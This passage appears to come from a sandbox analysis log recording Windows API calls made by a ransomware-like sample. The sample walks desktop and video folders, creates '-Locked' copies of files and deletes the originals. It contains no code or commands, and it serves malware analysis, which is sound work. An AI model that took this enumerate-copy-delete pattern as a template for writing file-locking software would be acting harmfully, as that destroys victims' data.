lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos", lpFilePart=0x0) returned 0x16 [0309.886] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\", lpFilePart=0x0) returned 0x17 [0309.886] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.886] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3816851, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3816851, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.887] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0309.887] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3816851, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0309.887] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0309.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0309.888] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\desktop.ini-Locked", lpFilePart=0x0) returned 0x29 [0309.888] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0309.888] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\desktop.ini-Locked" (normalized: "c:\\users\\public\\videos\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x44c [0309.889] GetFileType (hFile=0x44c) returned 0x1 [0309.889] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0309.889] GetFileType (hFile=0x44c) returned 0x1 [0309.891] CloseHandle (hObject=0x44c) returned 1 [0309.891] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\desktop.ini", lpFilePart=0x0) returned 0x22 [0309.892] DeleteFileW (lpFileName="C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini")) returned 1 [0309.892] CoTaskMemAlloc (cb=0x20c) returned 0x6c7110 [0309.892] SHGetFolderPathW (in: hwnd=0x0, csidl=25, hToken=0x0, dwFlags=0x0, pszPath=0x6c7110 | out: pszPath="C:\\Users\\Public\\Desktop") returned 0x0 [0309.894] CoTaskMemFree (pv=0x6c7110) [0309.894] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop", lpFilePart=0x0) returned 0x17 [0309.894] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0309.894] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop", lpFilePart=0x0) returned 0x17 [0309.894] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop\\", lpFilePart=0x0) returned 0x18 [0309.894] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x37f05f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x37f05f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.895] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x37f05f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x37f05f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.895] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x37f05f6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0309.895] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0309.895] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0309.896] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0309.896] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af1d0) returned 1 [0309.896] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop", nBufferLength=0x105, lpBuffer=0x1aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop", lpFilePart=0x0) returned 0x17 [0309.896] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop\\", lpFilePart=0x0) returned 0x18 [0309.896] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x1aeef8 | out: lpFindFileData=0x1aeef8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x37f05f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x37f05f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.897] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x37f05f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x37f05f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.897] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x37f05f6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0309.897] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x37f05f6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97421a72, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97421a72, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0309.897] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0309.898] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0309.898] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop\\desktop.ini-Locked", lpFilePart=0x0) returned 0x2a [0309.898] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0309.898] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\desktop.ini-Locked" (normalized: "c:\\users\\public\\desktop\\desktop.ini-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x480 [0309.900] GetFileType (hFile=0x480) returned 0x1 [0309.900] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0309.900] GetFileType (hFile=0x480) returned 0x1 [0309.902] CloseHandle (hObject=0x480) returned 1 [0309.902] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop\\desktop.ini", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop\\desktop.ini", lpFilePart=0x0) returned 0x23 [0309.903] DeleteFileW (lpFileName="C:\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini")) returned 1 [0309.904] CoTaskMemAlloc (cb=0x20c) returned 0x6c7110 [0309.904] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0x6c7110 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x0 [0309.905] CoTaskMemFree (pv=0x6c7110) [0309.905] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x0) returned 0x1d [0309.906] CoTaskMemAlloc (cb=0x228) returned 0x6c7110 [0309.906] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x6c7110, nSize=0x112 | out: lpBuffer="") returned 0x15 [0309.906] CoTaskMemFree (pv=0x6c7110) [0309.906] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af210) returned 1 [0309.906] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1aed18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0309.906] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", nBufferLength=0x105, lpBuffer=0x1aecec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpFilePart=0x0) returned 0x1e [0309.907] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*", lpFindFileData=0x1aef38 | out: lpFindFileData=0x1aef38*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x36718433, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36718433, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.907] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.907] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x36718433, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36718433, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.908] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x36718433, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36718433, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.908] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36702544, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x36702544, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36702544, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0aih45hu.jpg-Locked-Locked-Locked-Locked-Locked-Locked", cAlternateFileName="0AIH45~2.JPG")) returned 1 [0309.908] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3670d47e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3670d47e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3670d47e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4-0bKIu_zvUdt.mkv-Locked-Locked-Locked-Locked-Locked-Locked", cAlternateFileName="4-0BKI~1.MKV")) returned 1 [0309.909] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e0d6f00, ftCreationTime.dwHighDateTime=0x1d8224f, ftLastAccessTime.dwLowDateTime=0x7ea60580, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xdac2100, ftLastWriteTime.dwHighDateTime=0x1d82242, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", cAlternateFileName="69811A~1.EXE")) returned 1 [0309.909] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327920f7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327920f7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x367197fe, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", cAlternateFileName="69811A~2.EXE")) returned 1 [0309.909] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35f72b69, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35f72b69, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35f72b69, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked-Locked", cAlternateFileName="69811A~3.EXE")) returned 1 [0309.909] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a0a8d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a0a8d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a0a8d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf-Locked", cAlternateFileName="AUTORU~1.INF")) returned 1 [0309.910] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35fa387f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35fa387f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35fa387f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="autorun.inf-Locked-Locked", cAlternateFileName="AUTORU~2.INF")) returned 1 [0309.910] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef57e570, ftCreationTime.dwHighDateTime=0x1d7dc48, ftLastAccessTime.dwLowDateTime=0x36560d0c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36560d0c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj", cAlternateFileName="BGQH9X~1")) returned 1 [0309.910] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x326a0563, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x326a0563, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x326a0563, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj-Locked", cAlternateFileName="BGQH9X~2")) returned 1 [0309.911] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35fd6d70, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35fd6d70, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35fd6d70, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BGQh9XM98-F_E sIj-Locked-Locked", cAlternateFileName="BGQH9X~3")) returned 1 [0309.911] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327a9438, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327a9438, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327a9438, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc-Locked", cAlternateFileName="CSI0AP~2.DOC")) returned 1 [0309.911] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3602eacf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3602eacf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3602eacf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="csI0 APq22kpFx84um.doc-Locked-Locked", cAlternateFileName="CSI0AP~1.DOC")) returned 1 [0309.911] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327b56d2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327b56d2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327b56d2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc-Locked", cAlternateFileName="CX4AG~1.DOC")) returned 1 [0309.912] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3608b7bf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3608b7bf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3608b7bf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cx4Ag.doc-Locked-Locked", cAlternateFileName="CX4AG~2.DOC")) returned 1 [0309.912] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327c40db, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327c40db, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327c40db, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx-Locked", cAlternateFileName="D-A24D~2.XLS")) returned 1 [0309.912] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360ab2d2, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x360ab2d2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x360ab2d2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="d-a24dz0snVX.xlsx-Locked-Locked", cAlternateFileName="D-A24D~1.XLS")) returned 1 [0309.913] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327d17bd, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327d17bd, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327d17bd, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked", cAlternateFileName="DESKTO~1.INI")) returned 1 [0309.913] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360bd8ae, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x360bd8ae, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x360bd8ae, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini-Locked-Locked", cAlternateFileName="DESKTO~2.INI")) returned 1 [0309.913] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327effc0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x327effc0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x327effc0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="G2jIFnab-iHgfnotUdc.wav-Locked", cAlternateFileName="G2JIFN~2.WAV")) returned 1 [0309.914] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x360d10bf, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x360d10bf, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x360d10bf, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, 